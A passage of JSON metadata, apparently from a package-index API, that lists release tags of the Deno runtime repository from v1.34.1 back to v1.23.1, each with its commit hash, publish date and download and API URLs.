","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.